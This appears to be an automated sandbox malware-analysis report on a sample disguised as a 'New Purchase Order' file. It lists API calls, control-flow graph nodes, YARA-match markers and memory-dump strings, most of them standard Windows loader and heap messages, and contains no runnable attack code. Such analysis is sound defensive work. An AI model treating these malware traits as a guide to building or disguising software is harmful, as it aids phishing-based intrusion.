                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0

                                                          Control-flow Graph

                                                          control_flow_graph 391 1732c70-1732c7c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: S$l420377x$l420377x
                                                          • API String ID: 1836367815-2727433438

                                                          Control-flow Graph

                                                          control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: l420377x$l420377x
                                                          • API String ID: 1836367815-444879537

                                                          Control-flow Graph

                                                          control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                          APIs
                                                          • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: l420377x$l420377x
                                                          • API String ID: 1836367815-444879537

                                                          Control-flow Graph

                                                          control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: wdA
                                                          • API String ID: 3298025750-2931128418

                                                          Control-flow Graph

                                                          control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0

                                                          Control-flow Graph

                                                          control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0

                                                          Control-flow Graph

                                                          control_flow_graph 386 1732c0a-1732c0f 387 1732c11-1732c18 386->387 388 1732c1f-1732c26 LdrInitializeThunk 386->388
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          Strings
                                                          • Thread identifier, xrefs: 0176553A
                                                          • Address of the debug info found in the active list., xrefs: 017654AE, 017654FA
                                                          • Critical section debug info address, xrefs: 0176541F, 0176552E
                                                          • double initialized or corrupted critical section, xrefs: 01765508
                                                          • Invalid debug info address of this critical section, xrefs: 017654B6
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0176540A, 01765496, 01765519
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01765543
                                                          • Critical section address., xrefs: 01765502
                                                          • 8, xrefs: 017652E3
                                                          • Critical section address, xrefs: 01765425, 017654BC, 01765534
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017654CE
                                                          • undeleted critical section in freed memory, xrefs: 0176542B
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017654E2
                                                          • corrupted critical section, xrefs: 017654C2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          Strings
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017622E4
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01762412
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017624C0
                                                          • @, xrefs: 0176259B
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017625EB
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01762506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01762498
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01762409
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01762602
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01762624
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0176261F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          Strings
                                                          • VerifierFlags, xrefs: 01778C50
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01778A3D
                                                          • VerifierDlls, xrefs: 01778CBD
                                                          • HandleTraces, xrefs: 01778C8F
                                                          • AVRF: -*- final list of providers -*- , xrefs: 01778B8F
                                                          • VerifierDebug, xrefs: 01778CA5
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01778A67
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01749A2A
                                                          • apphelp.dll, xrefs: 016E6496
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017499ED
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01749A01
                                                          • LdrpInitShimEngine, xrefs: 017499F4, 01749A07, 01749A30
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01749A11, 01749A3A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          Strings
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01762180
                                                          • SXS: %s() passed the empty activation context, xrefs: 01762165
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017621BF
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0176219F
                                                          • RtlGetAssemblyStorageRoot, xrefs: 01762160, 0176219A, 017621BA
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01762178
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01768181, 017681F5
                                                          • LdrpInitializeProcess, xrefs: 0172C6C4
                                                          • Loading import redirection DLL: '%wZ', xrefs: 01768170
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 017681E5
                                                          • LdrpInitializeImportRedirection, xrefs: 01768177, 017681EB
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0172C6C3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          APIs
                                                            • Part of subcall function 01732DF0: LdrInitializeThunk.NTDLL ref: 01732DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01730D74
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          Strings
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0172855E
                                                          • LdrpInitializeProcess, xrefs: 01728422
                                                          • @, xrefs: 01728591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01728421
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 017621DE
                                                          • .Local, xrefs: 017228D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017621D9, 017622B1
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017622B6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          Strings
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01763437
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0176342A
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01763456
                                                          • RtlDeactivateActivationContext, xrefs: 01763425, 01763432, 01763451
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01751028
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017510AE
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01750FE5
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0175106B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          Strings
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0175A992
                                                          • LdrpDynamicShimModule, xrefs: 0175A998
                                                          • apphelp.dll, xrefs: 01712462
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0175A9A2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0170327D
                                                          • HEAP[%wZ]: , xrefs: 01703255
                                                          • HEAP: , xrefs: 01703264
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0175A10F
                                                          • LdrpCheckModule, xrefs: 0175A117
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0175A121
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 017682DE
                                                          • Failed to reallocate the system dirs string !, xrefs: 017682D7
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017682E8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          Strings
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017AC1C5
                                                          • @, xrefs: 017AC1F1
                                                          • PreferredUILanguages, xrefs: 017AC212
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          Strings
                                                          • LdrpCheckRedirection, xrefs: 0177488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01774899
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01774888
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          Strings
                                                          • LdrpInitializationFailure, xrefs: 017720FA
                                                          • Process initialization failed with status 0x%08lx, xrefs: 017720F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01772104
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
